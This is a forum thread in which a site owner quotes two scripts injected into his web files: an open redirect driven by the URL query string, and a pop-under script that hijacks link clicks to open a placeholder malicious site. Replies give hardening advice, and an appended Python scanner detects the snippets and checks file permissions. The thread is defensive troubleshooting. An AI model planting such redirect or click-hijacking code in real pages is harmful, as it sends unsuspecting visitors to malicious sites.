  1. #1
    Join Date
    Apr 2009
    Posts
    1,320

    Javascript hacking / injection on my server

    A lot of my htm, html and js files have been injected with these codes, which open a popup when I click anywhere on the web page. I've removed the URL of the popup that it opens when posting the codes here.

    I already set these files to 444 permission, how is the hacker still able to inject these malicious codes into my files?

    Code:
    <Script>
    var rr = location.search.substring(1);
    if(rr)window.location=decodeURIComponent(rr);
    </Script>
    Code:
    <script language="javascript">if (navigator.cookieEnabled){var pop_under = null;var pop_cookie_name = "snipped";var pop_timeout = 720;function pop_cookie_enabled(){var is_enabled = false;if (!window.opera && !navigator.cookieEnabled)return is_enabled;if (typeof document.cookie == 'string')if (document.cookie.length == 0){document.cookie = "test";is_enabled = document.cookie == 'test';document.cookie = '';}else{is_enabled = true;}return is_enabled;}function pop_getCookie(name){var cookie = " " + document.cookie;var search = " " + name + "=";var setStr = null;var offset = 0;var end = 0;if (cookie.length > 0){offset = cookie.indexOf(search);if (offset != -1){offset += search.length;end = cookie.indexOf(";", offset);if (end == -1){end = cookie.length;}setStr = unescape(cookie.substring(offset, end));}}return(setStr);}function pop_setCookie (name, value){document.cookie = name + "=" + escape(value) + "; expires=Friday,31-Dec-50 23:59:59 GMT; path=/;";}function show_pop(){var pop_wnd = "http://domain.com/virus/url/";var fea_wnd = "scrollbars=1,resizable=1,toolbar=1,location=1,menubar=1,status=1,directories=0";var need_open = true;if (document.onclick_copy != null)document.onclick_copy();if (document.body.onbeforeunload_copy != null)document.body.onbeforeunload_copy();if (pop_under != null){if (!pop_under.closed)need_open = false;}if (need_open){if (pop_cookie_enabled()){val = pop_getCookie(pop_cookie_name);if (val != null){now = new Date();val2 = new Date(val);utc32 = Date.UTC(now.getFullYear(), now.getMonth(), now.getDate(), now.getHours(), now.getMinutes(), now.getSeconds());utc2 = Date.UTC(val2.getFullYear(), val2.getMonth(), val2.getDate(), val2.getHours(), val2.getMinutes(), val2.getSeconds());if ( ( utc32 - utc2 ) / 1000 < pop_timeout*60){need_open = false;}}}}if (need_open){under = window.open(pop_wnd, "", fea_wnd);under.blur();window.focus();if (pop_cookie_enabled()){now = new Date();pop_setCookie(pop_cookie_name, now);}}}function pop_init(){var ver = 
parseFloat(navigator.appVersion);var ver2 = (navigator.userAgent.indexOf("Windows 95")>=0 || navigator.userAgent.indexOf("Windows 98")>=0 || navigator.userAgent.indexOf("Windows NT")>=0 )&&(navigator.userAgent.indexOf('Opera') == -1)&&(navigator.appName != 'Netscape') &&(navigator.userAgent.indexOf('MSIE') > -1) &&(navigator.userAgent.indexOf('SV1') > -1) &&(ver >= 4);if (ver2){if (document.links){for (var i=0; i<document.links.length; i++){if (document.links[i].target != "_blank"){document.links[i].onclick_copy = document.links[i].onclick;document.links[i].onclick = show_pop;}}}}document.onclick_copy = document.onclick;document.onmouseup = show_pop;}pop_init();}</script>

  2. #2
    Join Date
    Dec 2002
    Posts
    374
    Have you scanned your PC?

  3. Have you changed passwords? Server, cPanel, etc.?

  4. #4
    Join Date
    Apr 2009
    Posts
    1,320
    This is not password intrusion, it's a security exploit I am sure, but I don't know how they are doing it. This is very common like the iframe injections all over the web.

  5. #5
    Join Date
    Aug 2005
    Location
    Durham, NC USA
    Posts
    195
    If the hacker can get either root or owner privileges, then they can reset permissions on those files as needed.

    If your server is running suexec or suphp, then getting owner privileges (assuming they've already got a way to inject code) would be fairly easy.

    Finding how they're injecting the code in the first place is the tricky bit. Check your php.ini and make sure that's all locked down, make sure the server is fully patched, especially PHP and Apache.

    If you've installed ModSecurity, then check your logs to see if it has any warnings about the infected files. If you haven't installed it, you may want to.

    Let us know what you find.

    Akin
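
An added example, not part of the original thread: a small Python scanner that finds files carrying the two snippets quoted in post #1 and reports, for each hit, whether mode 444 actually stops a given account from changing it, which is the point post #5 makes about owner privileges. The function names, the sample web root and the uid passed in (standing for the account scripts run as under suexec/suPHP) are assumptions; a POSIX host is assumed.

```python
import os, re, stat, tempfile, time

# Markers copied from the two injected snippets quoted in post #1.
MARKERS = [re.compile(rb"window\.location\s*=\s*decodeURIComponent\("),
           re.compile(rb"pop_cookie_name|function\s+show_pop\s*\(")]
EXTS = (".htm", ".html", ".js")

def still_writable(path, uid):
    """True if `uid` can alter `path` even though its mode is read-only."""
    st, parent = os.stat(path), os.stat(os.path.dirname(path) or ".")
    owns_file = st.st_uid == uid  # the owner can simply chmod it back
    # A writable parent directory lets the file be deleted and recreated.
    # Simplification: group write bits and ACLs are not evaluated.
    dir_owner_w = parent.st_uid == uid and bool(parent.st_mode & stat.S_IWUSR)
    dir_world_w = bool(parent.st_mode & stat.S_IWOTH) and not parent.st_mode & stat.S_ISVTX
    return uid == 0 or owns_file or dir_owner_w or dir_world_w

def scan(root, uid):
    """Return one record per .htm/.html/.js file under `root` with a marker."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if not name.lower().endswith(EXTS):
                continue
            with open(path, "rb") as fh:
                data = fh.read()
            if not any(m.search(data) for m in MARKERS):
                continue
            st = os.stat(path)
            hits.append({"path": path, "mode": oct(stat.S_IMODE(st.st_mode)),
                         "owner_uid": st.st_uid, "mtime": time.ctime(st.st_mtime),
                         "writable_by_uid": still_writable(path, uid)})
    return hits

def build_demo():
    """Constructed sample web root: one infected 0444 file, one clean file."""
    root = tempfile.mkdtemp(prefix="webroot-")
    bad = os.path.join(root, "index.html")
    with open(bad, "w") as fh:
        fh.write("<html><body>hi</body></html>\n<Script>\nvar rr = location.search"
                 ".substring(1);\nif(rr)window.location=decodeURIComponent(rr);\n</Script>\n")
    os.chmod(bad, 0o444)
    with open(os.path.join(root, "about.html"), "w") as fh:
        fh.write("<html><body>clean</body></html>\n")
    return root

if __name__ == "__main__":
    for hit in scan(build_demo(), os.getuid()):
        print(hit)
```

The `mtime` values of the hits give a time window to line up against the Apache and ModSecurity logs mentioned in post #5.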
